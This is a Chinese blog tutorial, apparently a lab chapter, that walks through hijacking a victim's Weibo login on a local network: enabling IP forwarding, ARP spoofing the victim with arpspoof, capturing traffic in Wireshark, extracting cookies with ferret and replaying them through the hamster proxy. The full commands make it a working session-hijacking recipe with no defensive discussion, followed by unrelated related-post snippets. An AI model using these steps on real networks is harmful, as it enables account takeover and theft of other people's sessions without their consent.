2. 程式人生 > >kali攻防第3章 內網稱霸之Cookie擷取

kali攻防第3章 內網稱霸之Cookie擷取

阿新 發佈:2019-01-02

內網稱霸之Cookie擷取

準備工具

1、一臺KALI_LINUX系統

2、一臺被攻擊的windows系統

網路環境

Kali系統IP  10.10.10.131

Windows xp IP 10.10.10.129

使用的工具

arpspoof   -->欺騙工具 

wireshark -->抓包工具  

開始執行步驟

1、[email protected]:~# echo "1" > /proc/sys/net/ipv4/ip_forward

2、arpspoof -i eth0 -t 10.10.10.2 10.10.10.129

3、使用wireshark進行抓包

 

4、受害者10.10.10.129

開啟微博

 

5、停止抓包工具並儲存抓包資料為pcap格式,儲存名字為cookie

 

6、使用 ferret工具

如果沒有這個工具請使用命令

ferret沒有64位的

可以安裝32位的

1)新增對32位的支援

dpkg --add-architecture i386

2)更新

apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

3)安裝ferret

sudo aptitude install ferret-sidejack:i386

4)ferrer -r cookie.pacp

7、生成hamster.txt檔案,進行架設代理伺服器

[email protected]:~# hamster 

--- HAMPSTER 2.0 side-jacking tool ---

Set browser to use proxy http://127.0.0.1:1234

DEBUG: set_ports_option(1234)

DEBUG: mg_open_listening_port(1234)

Proxy: listening on 127.0.0.1:1234

begining thread

8、開啟10.10.10.131系統中的遊覽器,設定代理服務地址和埠並關閉arp欺騙

 

9、分析hamster資訊一條一條進行

 

相關推薦

kali攻防3 稱霸Cookie擷取

內網稱霸之Cookie擷取 準備工具 1、一臺KALI_LINUX系統 2、一臺被攻擊的windows系統 網路環境 Kali系統IP  10.10.10.131 Windows xp IP 10.10.10.129 使用的工具 arpspoof   --&g

kali攻防10 Burp Suite功能的簡單介紹

Burp Suite功能簡單介紹 介紹: 1、登入介面   2、Proxy功能 通過攔截,檢視和修改所有的請求和響應您的瀏覽器與目標Web伺服器之間傳遞。   3、Using BurpProxy http、https http 設定代理的方法:以http ie為例: 代理伺

3 面向對象構造方法

Java1.1 構造方法:主要用來給對象的數據進行初始化1.1.1 構造方法格式:A:構造方法格式a:方法名與類名相同b:沒有返回值類型,連void都沒有c:沒有具體的返回值1.1.1.1 案例代碼十一: package com.itheima_08; /* * 構造方法: * 給對象的數據進行初始化

Kali-Linux無線網路滲透測試-李亞偉-3-監聽WiFi網路--虛擬機器使用無線絡卡

如果要管理無線網絡卡,則首先需要將該網絡卡插入到系統中。當用戶在物理機中使用無線網絡卡時,可能直接會被識別出來。如果是在虛擬機器中使用的話,可能無法直接連線到虛擬機器的作業系統中。這時候使用者需要斷開該網絡卡與物理機的連線,然後選擇連線到虛擬機器。在虛擬機器中只支援USB

【學習筆記】慕課—Java設計模式精講 3 軟體設計七大原則-3-1 本導航

/** * 軟體設計七大原則-本章導航 學習筆記 * @author cnRicky * @date 2018.11.7 */ 本章導航 開閉原則(所有原則的一個基礎) 依賴倒置原則 單一職責原則 介面隔離原則 迪米特法則(最少知道原則) 里氏替換原則 合成/複用原則(組合

【學習筆記】慕課—Java設計模式精講 3 軟體設計七大原則-3-2 開閉原則

/** * 軟體設計七大原則-開閉原則 * @author cnRicky * @date 2018.11.7 */ 開閉原則 定義:一個軟體實體如類、模組和函式應該對擴充套件開放,對修改關閉 強調的是用抽象構建框架,用實現擴充套件細節 優點:提高軟體系統的可複用性及可維護性 開閉原則

【學習筆記】慕課—Java設計模式精講 3 軟體設計七大原則-3-6 迪米特原則(最少知道原則)

/** * 軟體設計七大原則-迪米特原則 學習筆記 * @author cnRicky * @date 2018.11.10 */ 迪米特原則(最少知道原則) 一個物件應該對其他物件保持最少的瞭解。又叫最少知道原則 迪米特原則主要強調:儘量降低類與類之間的耦合 優點:降低類與類之

【學習筆記】慕課—Java設計模式精講 3 軟體設計七大原則-3-5 介面隔離原則

/** * 軟體設計七大原則-介面隔離原則 學習筆記 * @author cnRicky * @date 2018.11.10 */ 介面隔離原則 定義:用多個專門的介面,而不使用單一的總介面,客戶端不應該依賴它不需要的介面 一個類對一個類的依賴應該建立在最小的介面上 建立單一介

【學習筆記】慕課—Java設計模式精講 3 軟體設計七大原則-3-4 單一職責原則

/** * 軟體設計七大原則-單一職責原則 學習筆記 * @author cnRicky * @date 2018.11.10 */ 單一職責原則 定義:不要存在多於一個導致類變更的原因 一個類只負責一個職責,如果分別有兩個職責,那就建立兩個類分別負責職責1和職責2 一個類/介面/方法只負

【學習筆記】慕課—Java設計模式精講 3 軟體設計七大原則-3-3 依賴倒置原則

/** * 軟體設計七大原則-依賴倒置原則 學習筆記 * @author cnRicky * @date 2018.11.10 */ 依賴倒置原則 高層模組不應該依賴低層模組,二者都應該依賴其抽象 抽象不應該依賴細節;細節應該依賴抽象 針對介面程式設計,不要針對實現程式設計(儘

31講算法與流程圖

blog images 技術 bsp mage -1 ima right mar 第3章第1講算法與流程圖

裴禮文數學分析中的典型問題與方法3一元微分學練習

處的 試題 4.6 $$ www 鄰域 5.6 為什麽 西安電子 參考解答見: http://www.cnblogs.com/zhangzujin/p/3527416.html 3.1.1 計算下列函數的指定導數: (1) $\dps{f(x)=\sqrt{\f{(

3 文件的權限管理

其他屬性 文件系統 strong 問題 ble wan centos 準備 行為 本文目錄: 3.1 文件/目錄的權限 3.2 實現權限的本質 3.3 umask說明 3.4 文件的擴展ACL權限 3.5 文件隱藏屬性 3.6 suid/sgid/sbit 3.1

轉載---編寫高質量代碼:改善Java程序的151個建議(3:類、對象及方法___建議47~51)

閱讀 aer 集中 記事本 哈希算法 讀者 堆內存 ref 類型判斷 閱讀目錄 建議47:在equals中使用getClass進行類型判斷 建議48:覆寫equals方法必須覆寫hashCode方法 建議49:推薦覆寫toString方法 建議50:使用package

轉載---編寫高質量代碼:改善Java程序的151個建議(3:類、對象及方法___建議41~46)

equals 業務 父親 face 使用 訪問 his () 而是 閱讀目錄 建議41:讓多重繼承成為現實 建議42:讓工具類不可實例化 建議43:避免對象的淺拷貝 建議44:推薦使用序列化對象的拷貝 建議45:覆寫equals方法時不要識別不出自己 建議46:equ

Python作業本——3 函數

exc logs enter urn 沒有 != clas sof 概念 今天看完了第三章,習題都是一些概念性的問題,就不一一解答了。 實踐項目是創建一個Collatz序列,並且加上驗證輸入是不是一個整數。 1 def collatz(number): 2 i

3階段——核啟動分析創建si工程和啟動核分析(3)

otl cin 由於 noi 找到 常用工具 isa maintain inf 目標: (1)創建Source Insight 工程,方便後面分析如何啟動內核的 (2)分析uboot傳遞參數,鏈接腳本如何進入stext的 (3) 分析stext函數如何啟動內核

3階段——核啟動分析start_kernel初始化函數(5)

本質 aware 字符 信息 異常 性能 ack ifdef 取數 內核啟動分析之start_kernel初始化函數(init/main.c) stext函數啟動內核後,就開始進入start_kernel初始化各個函數, 下面只是淺嘗輒止的描述一下函數的功能,很多函數真正理

redis實戰筆記(3)-3 Redis命令

chan 4.4 ges 打包 常用 重要 讀取 表操作 nio 第3章 Redis命令 本章主要內容 字符串命令、 列表命令和集合命令 散列命令和有序集合命令 發布命令與訂閱命令 其他命令 在每個不同的數據類型的章節裏, 展示的都是該數據類型所獨有的、 最具代表性

1·子劃分的意義及案例

子網劃分 偶潮鋒· 本章目的· 子網劃分的意義:· 節約IP地址,避免浪費· 限定廣播的傳播· 保證網絡的安全· 有助於覆蓋大型地理區域· 私有IP地址:· 私有IP地址的含義:· 屬於非註冊地址,專門為組織機構內部使用,它是局域網範疇內的,私有IP禁止出現在internet中。· 私有IP地址範圍:· 1